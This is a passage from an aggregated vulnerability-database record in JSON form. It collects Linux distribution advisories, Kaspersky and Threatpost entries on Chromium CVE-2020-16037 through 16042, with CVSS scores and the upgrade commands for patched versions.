"baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-07T00:00:00", "type": "suse", "title": "Security update for chromium (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-07T00:00:00", "id": "OPENSUSE-SU-2020:2181-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/CDMZGVMNSMD6LDMI25NDRZ36NEBSFUHY/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-09T21:01:21", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n Update to 87.0.4280.88 (boo#1179576)\n\n - CVE-2020-16037: Use after free in clipboard\n - CVE-2020-16038: Use after free in media\n - CVE-2020-16039: Use after free in extensions\n - CVE-2020-16040: Insufficient data validation in V8\n - CVE-2020-16041: Out of bounds read in networking\n - CVE-2020-16042: Uninitialized Use in V8\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2020-2213=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-09T00:00:00", "type": "suse", "title": "Security update for chromium (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-09T00:00:00", "id": "OPENSUSE-SU-2020:2213-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VCC4XLQNOV2QXKDOJAWY34R26577RWDC/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-21T01:36:08", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-87.0.4280.88-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-21T01:36:08", "id": "FEDORA:36BA8304C362", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E6VSHJODAYV2MX5DYEGZBHY5ZVRZX7ZF/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-10T01:16:46", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-87.0.4280.88-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-10T01:16:46", "id": "FEDORA:7C45D30B3717", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DK3SURYWGBARPXOXFVAAPZRJEZXZHYYG/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-04T20:49:47", "description": "Google has updated its Chrome web browser, fixing four bugs with a severity rating of \u201chigh\u201d and eight overall. Three are use-after-free flaws, which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n\nOn Friday, the Cybersecurity and Infrastructure Security Agency (CISA) [issued a security bulletin](<https://us-cert.cisa.gov/ncas/current-activity/2020/12/04/google-releases-security-updates-chrome>) urging users and infosec administrators to apply the update. The agency warned that the vulnerabilities can be used by an attacker \u201cto take control of an affected system.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Google\u2019s December security bulletin, previous Windows, macOS and Linux versions of the Chrome desktop browser are vulnerable to attacks. An updated 87.0.4280.88 version of Chrome addresses the bugs and will \u201croll out over the coming days/weeks,\u201d [Google wrote](<https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html>).\n\n## **How to Manually Update Your Chrome Browser**\n\nTo manually update your Chrome browser, visit Chrome\u2019s customization drop-down menu in the upper-right hand side of the client. From that menu select \u201cHelp\u201d and then \u201cAbout Google Chrome.\u201d Opening that menu item automatically triggers Chrome to look for updates.\n\nDetails tied to each of the bugs are being withheld at this time, Google said, \u201cuntil a majority of users are updated with a fix.\u201d It also noted that when and if bugs exist in third-party code libraries used in other devices or platforms, technical details of the bugs will be limited.\n\n## **Bug Breakdowns: Unique Linux Flaw **\n\nThree high-severity bugs each include use-after-free elements impacting memory, tied to Chrome\u2019s clipboard, media and extensions components. The bugs are tracked as CVE-2020-16037, CVE-2020-16038 and CVE-2020-16039.\n\nThe fourth high-severity bug (CVE-2020-16040) impacts Google\u2019s open-source and high-performance JavaScript and WebAssembly engine, called V8. The bug is identified as an insufficient-data-validation flaw, which in some cases opens targets to cross-site scripting attacks.\n\nGoogle\u2019s V8 JavaScript engine also received a second patch this month \u2014 one of two medium-severity bugs reported this December. Tracked as CVE-2020-16042, that issue is identified as an \u201cuninitialized-use\u201d bug impacting V8. It\u2019s unclear from Google\u2019s bulletin the exact nature of the flaw. But cybersecurity researchers have described these types of uninitialized-use bugs as \u201clargely overlooked\u201d and often \u201cregarded as insignificant memory errors.\u201d\n\n\u201c[These] are actually a critical attack vector that can be reliably exploited by hackers to launch privilege-escalation attacks in the Linux kernel,\u201d according to [2017 research published](<https://www.sciencedaily.com/releases/2017/03/170302115737.htm>) by the Georgia Institute of Technology.\n\nA second medium-severity bug (CVE-2020-16041) is an \u201cout-of-bounds read in networking\u201d vulnerability. This could allow an adversary to improperly access objects in memory. While technical details of the CVE are also being withheld, this type of vulnerability could allow an unauthenticated adversary to send a malformed message to vulnerable software. Due to insufficient validation of the message, the targeted program could be forced to crash.\n\nGoogle acknowledged several security researchers that contributed to identifying this month\u2019s bugs. Ryoya Tsukasaki was thanked for finding the use-after-free bug (CVE-2020-16037) in the Chrome clipboard, which earned the researcher a $5,000 bug bounty. Khalil Zhani, Lucas Pinheiro, Sergei Glazunov, Andr\u00e9 Bargull and Mark Brand were also credited for their bug-hunting efforts.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows, and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n", "cvss3": {}, "published": "2020-12-04T20:40:45", "type": "threatpost", "title": "High-Severity Chrome Bugs Allow Browser Hacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-04T20:40:45", "id": "THREATPOST:BE769DEEED5A9DC3EB7A86AD40F8F968", "href": "https://threatpost.com/google_chrome_bugs_patched/161907/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-28T18:13:07", "description": "Google\u2019s Chrome browser has several security vulnerabilities that could pave the way to multiple types of attacks, including a V8 bug that could allow remote code execution (RCE) within a user\u2019s browser.\n\nThe high-severity V8 issue is tracked as CVE-2021-21227, and was reported by Gengming Liu from Singular Security Lab. Google describes the bug as \u201cinsufficient data validation in V8\u201d but is keeping other details close to its vest.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/21082808/PromoPic2-300x138.png)](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nHowever, Liu told SecurityWeek that the bug is somewhat mitigated by the fact that it doesn\u2019t allow attackers to escape the sandbox where Chrome runs, meaning attackers can\u2019t reach any of the other program, data and applications on the computer. Thus, CVE-2021-21227 would need to be chained with another vulnerability in order to successfully wreak havoc on a target\u2019s machine beyond the browser itself.\n\nThe researcher [also noted](<https://www.securityweek.com/google-patches-yet-another-serious-v8-vulnerability-chrome>) that his discovery is related to prior, now-patched V8 vulnerabilities ([CVE-2020-16040](<https://nvd.nist.gov/vuln/detail/CVE-2020-16040>) and [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>)). The first allows a remote attacker to exploit heap corruption if a user visits, or is redirected to, a specially crafted web page. The latter is a type-confusion bug that allows a remote attacker to potentially perform out of bounds memory access, also exploitable with a specially crafted HTML page.\n\nMeanwhile, according to [another report](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2021-056/>), the implications of an attack using the bug depends on the privileges associated with the application: In the worst-case scenario, an attacker could view, change or delete data.\n\nAnd, if someone has turned off sandboxing, all bets are off.\n\nGoogle recently patched a zero-day in Chrome ([for which a researcher dropped code on Twitter](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>)). That was another V8 issue that allowed RCE inside the browser app (but not sandbox escape).\n\n## **Nine Chrome 90 Patches to Roll Out**\n\nDetails of all nine of the Google Chrome vulnerabilities are as follows. They affect Chrome and possibly other browsers, like Microsoft Edge, that use the Chromium framework:\n\n * **CVE-2021-21227:** Insufficient-data-validation vulnerability that exists in the V8 component.\n * **CVE-2021-21228:** Insufficient-policy-enforcement vulnerability that exists in extensions.\n * **CVE-2021-21229:** Incorrect-security-UI vulnerability exists in downloads.\n * **CVE-2021-21230:** Type-confusion vulnerability exists in the V8 component.\n * **CVE-2021-21231**: Insufficient-data-validation vulnerability exists in the V8 component.\n * **CVE-2021-21232:** Use-after-free vulnerability that exists in Dev Tools component.\n * **CVE-2021-21233:** Heap-buffer-overflow vulnerability that exists in the ANGLE component.\n\nGoogle has addressed the flaws in its latest [stable channel release](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_26.html>) (90.0.4430.93) for Windows, Mac and Linux, delivered on Tuesday. The Chrome 90 updates will roll out over the next days and weeks, the search giant said.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-04-28T17:48:16", "type": "threatpost", "title": "Google Chrome V8 Bug Allows Remote Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15965", "CVE-2020-16040", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-04-28T17:48:16", "id": "THREATPOST:54718EAE6A3AD996F13E22A17C765CCC", "href": "https://threatpost.com/google-chrome-v8-bug-remote-code-execution/165662/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-02-08T15:49:15", "description": "### *Detect date*:\n12/02/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, obtain sensitive information, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 87.0.4280.88\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2020-16039](<https://vulners.com/cve/CVE-2020-16039>)9.3Critical \n[CVE-2020-16042](<https://vulners.com/cve/CVE-2020-16042>)4.3Warning \n[CVE-2020-16037](<https://vulners.com/cve/CVE-2020-16037>)9.3Critical \n[CVE-2020-16038](<https://vulners.com/cve/CVE-2020-16038>)9.3Critical \n[CVE-2020-16041](<https://vulners.com/cve/CVE-2020-16041>)5.8High \n[CVE-2020-16040](<https://vulners.com/cve/CVE-2020-16040>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "kaspersky", "title": "KLA12018 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-06-22T00:00:00", "id": "KLA12018", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12018/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:57", "description": "Arch Linux Security Advisory ASA-202012-14\n==========================================\n\nSeverity: High\nDate : 2020-12-09\nCVE-ID : CVE-2020-16037 CVE-2020-16038 CVE-2020-16039 CVE-2020-16040\nCVE-2020-16041 CVE-2020-16042\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1323\n\nSummary\n=======\n\nThe package chromium before version 87.0.4280.88-1 is vulnerable to\nmultiple issues including arbitrary code execution, information\ndisclosure, insufficient validation and denial of service.\n\nResolution\n==========\n\nUpgrade to 87.0.4280.88-1.\n\n# pacman -Syu \"chromium>=87.0.4280.88-1\"\n\nThe problems have been fixed upstream in version 87.0.4280.88.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-16037 (arbitrary code execution)\n\nA use after free security issue has been found in the clipboard\ncomponent of the chromium browser before version 87.0.4280.88.\n\n- CVE-2020-16038 (arbitrary code execution)\n\nA use after free security issue has been found in the media component\nof the chromium browser before version 87.0.4280.88.\n\n- CVE-2020-16039 (arbitrary code execution)\n\nA use after free security issue has been found in the extensions\ncomponent of the chromium browser before version 87.0.4280.88.\n\n- CVE-2020-16040 (insufficient validation)\n\nAn insufficient data validation security issue has been found in the V8\ncomponent of the chromium browser before version 87.0.4280.88.\n\n- CVE-2020-16041 (denial of service)\n\nAn out of bounds read security issue has been found in the networking\ncomponent of the chromium browser before version 87.0.4280.88.\n\n- CVE-2020-16042 (information disclosure)\n\nAn uninitialized use security issue has been found in the V8 component\nof the chromium browser before version 87.0.4280.88 and Firefox before\n84.0.\n\nImpact\n======\n\nA remote attacker might be able to crash the application, read memory\nor execute arbitrary code.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html\nhttps://crbug.com/1142331\nhttps://crbug.com/1138683\nhttps://crbug.com/1149177\nhttps://crbug.com/1150649\nhttps://crbug.com/1151865\nhttps://crbug.com/1151890\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2020-54/#CVE-2020-16042\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1679003\nhttps://security.archlinux.org/CVE-2020-16037\nhttps://security.archlinux.org/CVE-2020-16038\nhttps://security.archlinux.org/CVE-2020-16039\nhttps://security.archlinux.org/CVE-2020-16040\nhttps://security.archlinux.org/CVE-2020-16041\nhttps://security.archlinux.org/CVE-2020-16042", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-09T00:00:00", "type": "archlinux", "title": "[ASA-202012-14] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-09T00:00:00", "id": "ASA-202012-14", "href": "https://security.archlinux.org/ASA-202012-14", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:00:50", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-87.0.4280.88\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-87.0.4280.88\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-07T00:00:00", "type": "gentoo", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16014", "CVE-2020-16015", "CVE-2020-16018", "CVE-2020-16019", "CVE-2020-16020", "CVE-2020-16021", "CVE-2020-16022", "CVE-2020-16023", "CVE-2020-16024", "CVE-2020-16025", "CVE-2020-16026", "CVE-2020-16027", "CVE-2020-16028", "CVE-2020-16029", "CVE-2020-16030", "CVE-2020-16031", "CVE-2020-16032", "CVE-2020-16033", "CVE-2020-16034", "CVE-2020-16036", "CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-07T00:00:00", "id": "GLSA-202012-05", "href": "https://security.gentoo.org/glsa/202012-05", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2023-02-24T11:15:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4824-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 01, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-8075 CVE-2020-6510 CVE-2020-6511 CVE-2020-6512 \n CVE-2020-6513 CVE-2020-6514 CVE-2020-6515 CVE-2020-6516 \n CVE-2020-6517 CVE-2020-6518 CVE-2020-6519 CVE-2020-6520 \n CVE-2020-6521 CVE-2020-6522 CVE-2020-6523 CVE-2020-6524 \n CVE-2020-6525 CVE-2020-6526 CVE-2020-6527 CVE-2020-6528 \n CVE-2020-6529 CVE-2020-6530 CVE-2020-6531 CVE-2020-6532 \n CVE-2020-6533 CVE-2020-6534 CVE-2020-6535 CVE-2020-6536 \n CVE-2020-6537 CVE-2020-6538 CVE-2020-6539 CVE-2020-6540 \n CVE-2020-6541 CVE-2020-6542 CVE-2020-6543 CVE-2020-6544 \n CVE-2020-6545 CVE-2020-6546 CVE-2020-6547 CVE-2020-6548 \n CVE-2020-6549 CVE-2020-6550 CVE-2020-6551 CVE-2020-6552 \n CVE-2020-6553 CVE-2020-6554 CVE-2020-6555 CVE-2020-6556 \n CVE-2020-6557 CVE-2020-6558 CVE-2020-6559 CVE-2020-6560 \n CVE-2020-6561 CVE-2020-6562 CVE-2020-6563 CVE-2020-6564 \n CVE-2020-6565 CVE-2020-6566 CVE-2020-6567 CVE-2020-6568 \n CVE-2020-6569 CVE-2020-6570 CVE-2020-6571 CVE-2020-6573 \n CVE-2020-6574 CVE-2020-6575 CVE-2020-6576 CVE-2020-15959 \n CVE-2020-15960 CVE-2020-15961 CVE-2020-15962 CVE-2020-15963 \n CVE-2020-15964 CVE-2020-15965 CVE-2020-15966 CVE-2020-15967 \n CVE-2020-15968 CVE-2020-15969 CVE-2020-15970 CVE-2020-15971 \n CVE-2020-15972 CVE-2020-15973 CVE-2020-15974 CVE-2020-15975 \n CVE-2020-15976 CVE-2020-15977 CVE-2020-15978 CVE-2020-15979 \n CVE-2020-15980 CVE-2020-15981 CVE-2020-15982 CVE-2020-15983 \n CVE-2020-15984 CVE-2020-15985 CVE-2020-15986 CVE-2020-15987 \n CVE-2020-15988 CVE-2020-15989 CVE-2020-15990 CVE-2020-15991 \n CVE-2020-15992 CVE-2020-15999 CVE-2020-16000 CVE-2020-16001 \n CVE-2020-16002 CVE-2020-16003 CVE-2020-16004 CVE-2020-16005 \n CVE-2020-16006 CVE-2020-16007 CVE-2020-16008 CVE-2020-16009 \n CVE-2020-16011 CVE-2020-16012 CVE-2020-16013 CVE-2020-16014 \n CVE-2020-16015 CVE-2020-16016 CVE-2020-16017 CVE-2020-16018 \n CVE-2020-16019 CVE-2020-16020 CVE-2020-16021 CVE-2020-16022 \n CVE-2020-16023 CVE-2020-16024 CVE-2020-16025 CVE-2020-16026 \n CVE-2020-16027 CVE-2020-16028 CVE-2020-16029 CVE-2020-16030 \n CVE-2020-16031 CVE-2020-16032 CVE-2020-16033 CVE-2020-16034 \n CVE-2020-16035 CVE-2020-16036 CVE-2020-16037 CVE-2020-16038 \n CVE-2020-16039 CVE-2020-16040 CVE-2020-16041 CVE-2020-16042\n\nMultiple security issues were discovered in the Chromium web browser, which\ncould result in the execution of arbitrary code, denial of service\nor information disclosure.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 87.0.4280.88-0.4~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 